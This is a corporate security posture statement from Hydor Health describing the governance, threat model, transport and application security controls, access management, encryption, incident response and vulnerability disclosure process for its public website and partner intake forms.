Security Posture.

1. Scope and effective date

This Security Posture statement (the "Statement") describes the security controls, governance practices, and disclosure procedures that Hydor Health applies to its public-facing properties and to the partner intake surfaces operated under the hydorhealth.com domain. It is effective as of the date of last publication shown in the site footer and supersedes any prior posture document released under the same title.

Scope is limited to (a) the hydorhealth.com public website and its subdomains, (b) the partner and investor inquiry intake forms operated under those domains, and (c) the corporate infrastructure that supports those public surfaces. Production deployments of Hydor OS, Hydor MIM, and Dr. Kai are governed by separate written agreements, including Business Associate Agreements (BAAs) where Protected Health Information (PHI) is involved. Nothing here modifies those agreements.

Hydor Health may update this Statement at any time. Material changes are reflected in the published revision date and, where appropriate, communicated through the Trust Center.

2. Governance and accountability

Security is owned by the Chief Information Security Officer (CISO), who reports to the Chief Executive Officer and presents quarterly to the board. The CISO holds final accountability for the security program, the incident response runbook, the vendor risk register, and the posture set out here.

A standing Security Committee meets monthly and includes the CISO, the CIO, the Privacy Officer, the head of platform engineering, and the head of corporate operations. It reviews open risks, the incident log, the penetration test backlog, and the access review record. Minutes are retained for seven years.

Escalation runs along a documented path. Tier-one incidents are managed by the on-call engineering lead. Tier-two and tier-three incidents are escalated to the CISO within fifteen minutes of confirmation. Tier-three incidents trigger immediate notification to the CEO, the General Counsel, and (where contractually required) the affected counterparty. The escalation tree is rehearsed during the quarterly incident response drill.

3. Threat model

Hydor Health defends the public site and the partner intake against the actors and techniques most likely to target a sovereign health platform headquartered in the United States. In scope: credential stuffing, automated scraping, denial-of-service attacks at the network and application layers, supply-chain compromise through third-party dependencies or build tooling, social engineering of the workforce, phishing directed at executives, and targeted reconnaissance from financially motivated and state-aligned actors.

Out of scope: physical attacks against counterparty data centers, attacks against counterparty-operated infrastructure that Hydor Health does not control, threats against third-party services outside the documented integration boundary, and any matter governed by a separate written agreement (which controls).

The threat model is reviewed at minimum annually and after any material change to the public attack surface. The current version is held by the CISO and shared with vetted counterparties under non-disclosure on request.

4. Network and transport security

All public traffic is served over HTTPS only. TLS 1.3 is the minimum negotiated version; TLS 1.2 is permitted only for legacy compatibility on specific endpoints and is scheduled for retirement on the timeline published in the Trust Center. Plaintext HTTP is redirected at the edge.

HTTP Strict Transport Security (HSTS) is enforced with a one-year max-age, includeSubDomains, and preload directives. The hydorhealth.com apex and its subdomains are on the HSTS preload list. Certificate issuance is managed through an automated pipeline with Certificate Transparency log monitoring and weekly CAA record verification. Certificates use ECDSA P-256 keys with RSA 2048 fallback where required by counterparty policy.

The cipher policy excludes RC4, 3DES, export-grade ciphers, and any suite using SHA-1. AEAD ciphers (AES-GCM and ChaCha20-Poly1305) are preferred. Forward secrecy is required for every accepted suite. The cipher policy is reviewed quarterly against the recommendations of the IETF and the U.S. National Institute of Standards and Technology (NIST).

5. Application security

The public application is built on Next.js with server-rendered routing and a default deny posture for client-side execution. A Content Security Policy (CSP) is published with explicit allow-lists for script, style, image, font, frame-ancestors, and connect directives. Inline script and inline style are restricted to nonce-allowed instances. CSP violations report to a monitored endpoint and the policy is reviewed monthly.

Subresource Integrity (SRI) hashes are required for any third-party script or stylesheet served from a CDN. Cross-Site Request Forgery (CSRF) protection is enforced on every state-changing request through synchronizer tokens and SameSite=Strict cookie scoping. Rate limiting is enforced at the edge on a per-IP and per-route basis, with stricter ceilings on intake endpoints.

Input validation is performed at the edge (schema validation through Zod) and at the application boundary, with explicit allow-list rules for any field carried in a URL parameter or a form submission. Output is encoded contextually (HTML, attribute, JavaScript, CSS, URL) at the rendering layer. Any deviation from the framework security defaults is reviewed by the CISO before merge.

6. Infrastructure security

Every public Hydor Health property sits behind Cloudflare. The Cloudflare Web Application Firewall (WAF) enforces the managed rule set, the OWASP core rule set, and a Hydor-authored custom rule set tuned for the partner intake forms. Bot management challenges or blocks traffic that exceeds documented behavioral thresholds. Distributed Denial of Service (DDoS) protection is active at the network and application layers.

The application is served from a global edge runtime with origin shielding. Origin servers are not reachable directly from the public internet; they accept connections only from authenticated Cloudflare edge addresses through an authenticated tunnel. The origin is segmented from corporate and production platform infrastructure by independent virtual networks.

All infrastructure-as-code definitions are stored in version control, reviewed under a two-party approval rule, and applied through a CI pipeline with mandatory drift detection. Drift outside an approved window triggers an alert and is investigated as a potential incident until ruled benign.

7. Identity, access, and credentialing

Workforce access is governed by the principle of least privilege. Every workforce member has a unique identity. Group-shared credentials are prohibited. Production access requires phishing-resistant multi-factor authentication (MFA) using FIDO2 hardware keys; time-based one-time passwords are accepted only for break-glass scenarios under documented approval.

Standing administrative access is minimized. Just-in-time elevation is the default: a workforce member requests elevation for a defined task, an independent approver grants it for a defined window, and the event is logged and audited. Elevations are reviewed weekly by the CISO or designee.

Access reviews are performed quarterly across every workforce role, vendor account, and service principal. Stale accounts are deprovisioned within five business days. Departing workforce members have access revoked at or before the end of their last working hour, with a verification step recorded in the offboarding ticket.

8. Data classification

Hydor Health classifies data into four levels: Public, Internal, Confidential, and Restricted. Public data is approved for unrestricted release. Internal data is for workforce use only. Confidential data carries contractual, reputational, or regulatory sensitivity. Restricted data carries the highest sensitivity and includes PHI, regulated financial data, and material non-public information.

Each class has documented handling rules covering storage, transmission, retention, access control, logging, and destruction. Confidential and Restricted data must be encrypted in transit and at rest, accessed only by workforce members with a documented business need, and logged at every access event. Restricted data is additionally subject to the controls required under the applicable BAA or regulatory regime.

Information submitted through the partner inquiry form is classified Confidential at minimum. If submitted content includes PHI (notwithstanding the instruction not to submit PHI through public forms), it is reclassified Restricted on receipt, isolated, and handled under the breach evaluation procedure in the HIPAA Posture statement.

9. Encryption

Data in transit is protected by TLS 1.3 as set out in Section 4. Internal service-to-service traffic uses mutually authenticated TLS with short-lived certificates from an internal CA. Data at rest is encrypted with AES-256-GCM or an equivalent NIST-approved authenticated cipher. Database-level encryption is paired with application-layer encryption for the most sensitive fields, including any field that may contain PHI under a BAA.

Key management runs in a hardware security module (HSM) or an equivalent cloud key service operated under FIPS 140-2 Level 3 or higher. Keys are rotated on a documented schedule and key access is restricted to a small named set of workforce roles. Key access events are logged and reviewed weekly.

A quantum-ready posture is on the roadmap. Hydor Health is tracking NIST post-quantum standards (ML-KEM and ML-DSA) and intends to deploy hybrid post-quantum key exchange across platform surfaces on the schedule published in the Trust Center.

10. Logging, monitoring, and detection

Security-relevant events are emitted from every layer of the public stack: edge, application, origin, infrastructure, and identity provider. Events are shipped to a centralized log pipeline with structured fields and integrity-protected storage. The pipeline feeds a SIEM system that applies a combination of vendor-managed and Hydor-authored detection rules.

Alerting thresholds are tuned for signal. Tier-one alerts page the on-call engineering lead on a documented response time objective. Tier-two alerts route to the security queue for review within one business day. Tier-three alerts trigger the incident response runbook in Section 12.

Log retention defaults to thirteen months for security and access logs, with longer retention applied to events relevant under contractual or regulatory obligation. Logs are integrity-protected and stored on infrastructure separated from the systems that generate them.

11. Vulnerability management

Hydor Health runs a continuous vulnerability management program with three layers. Dependency scanning runs on every commit and on a daily schedule against the production manifest, using GitHub Dependabot and a commercial software composition analysis tool. Static Application Security Testing (SAST) runs in CI on every pull request and blocks merges that introduce high-severity findings. Dynamic Application Security Testing (DAST) runs against staging on a documented cadence.

An independent firm performs an external penetration test of the public surface on a quarterly cadence. Scope includes the public website, the partner intake forms, the authentication surface, and any newly released public endpoint. The report is reviewed by the CISO within five business days of receipt and findings are tracked in the vulnerability backlog.

Service Level Objectives for patching: Critical Common Vulnerabilities and Exposures (CVEs), CVSS 9.0 and above, are patched or mitigated within seven calendar days of confirmed applicability. High CVEs, CVSS 7.0 to 8.9, are patched within thirty calendar days. Medium and low CVEs follow the standard release cadence. Out-of-band patches are deployed for any CVE under active exploitation regardless of score.

12. Incident response

Hydor Health maintains a documented Incident Response Plan with named roles, decision authorities, communication templates, and external contact lists. The plan covers detection, triage, containment, eradication, recovery, and post-incident review. It is reviewed annually and rehearsed quarterly through a tabletop exercise that includes the CISO, the CIO, the Privacy Officer, the General Counsel, and the on-call engineering lead.

Customer and regulator notification timelines are committed in contract. Where a BAA is in place, breach notification to the covered entity is provided without unreasonable delay and in any event within the timeline required under the agreement and under the HITECH Act. Where state or international law requires direct notification, Hydor Health coordinates with the covered entity to satisfy that requirement.

Coordinated vulnerability disclosure is welcome. Researchers may submit findings to security@hydorhealth.com. Hydor Health acknowledges submissions within two business days, communicates a triage outcome within ten business days, and credits researchers on request. A safe harbor applies to good-faith research that follows the coordinated disclosure policy.

13. Business continuity and disaster recovery

Recovery Time Objective (RTO) for the public website is four hours. Recovery Point Objective (RPO) is fifteen minutes. The site is served from a globally distributed edge runtime with multi-region origin redundancy, and the content layer is restored from version control on demand.

Backups of all stateful systems supporting the public surface run on at least a daily cadence, are encrypted with keys distinct from the production data encryption keys, and are retained in a geographically separate region. Restore drills run quarterly and the results are recorded in the Security Committee minutes. A failed drill triggers a remediation cycle tracked to closure.

A separate Disaster Recovery Plan covers loss of a primary cloud region, loss of the corporate identity provider, and loss of the primary code repository. Each scenario has a documented runbook and a named owner. The plan is reviewed annually.

14. Vendor and subprocessor management

Every vendor that handles Confidential or Restricted data on behalf of Hydor Health is reviewed against the Vendor Risk Management standard before engagement. The review covers vendor security posture, contractual data protection terms, data residency, and any sub-processor chain.

A signed Business Associate Agreement is required for any vendor that creates, receives, maintains, or transmits PHI on behalf of Hydor Health. The BAA flows down the obligations required under 45 C.F.R. § 164.504(e) and the HITECH Act. Vendors that decline to sign a HIPAA-compliant BAA are not engaged for any work touching PHI.

The current sub-processor list is available to vetted counterparties on request through privacy@hydorhealth.com. Changes affecting a counterparty are communicated through the notice path in the relevant agreement.

15. Compliance posture summary

Hydor Health aligns the public site and the partner intake against: HIPAA and the HITECH Act, as further described in the HIPAA Posture statement at /legal/hipaa; Section 508 of the Rehabilitation Act and WCAG 2.1 AA, as further described in the Accessibility Statement at /legal/accessibility; the EU GDPR and the California CCPA/CPRA, to the extent applicable.

Hydor Health does not sell or rent personal information or PHI to any third party. No financial consideration is exchanged for the disclosure of personal information collected through the public site. California visitors may exercise CCPA rights through privacy@hydorhealth.com. EEA and UK visitors may exercise GDPR rights through the same address.

16. Reporting a vulnerability

Security researchers and the public are encouraged to report suspected vulnerabilities to security@hydorhealth.com. A PGP public key is available on request. Reports should include sufficient information for Hydor Health to reproduce and triage the finding, including affected URL, affected parameter, request method, observed behavior, and any proof-of-concept content.

Hydor Health commits to acknowledge receipt within two business days, provide a triage update within ten business days, and coordinate disclosure timing with the reporter. Public credit is offered on request unless the reporter prefers anonymity. Findings made in good faith under the published coordinated disclosure policy are not subject to legal action by Hydor Health.

17. Governing law and contact

This Statement and any dispute arising out of or relating to it are governed by the laws of the State of Texas, United States of America, without regard to its conflict-of-laws principles. Federal law applies where preempted or where it otherwise governs. The exclusive venue for any action arising out of or relating to this Statement is the state and federal courts located in Harris County, Texas, and the parties consent to the personal jurisdiction of those courts.

Notices under this Statement should be addressed to: Hydor Health, Attention: CISO, Houston, Texas, United States of America, with a copy by email to security@hydorhealth.com. The CISO is the named officer accountable for the Hydor Health security program and the published posture set out above.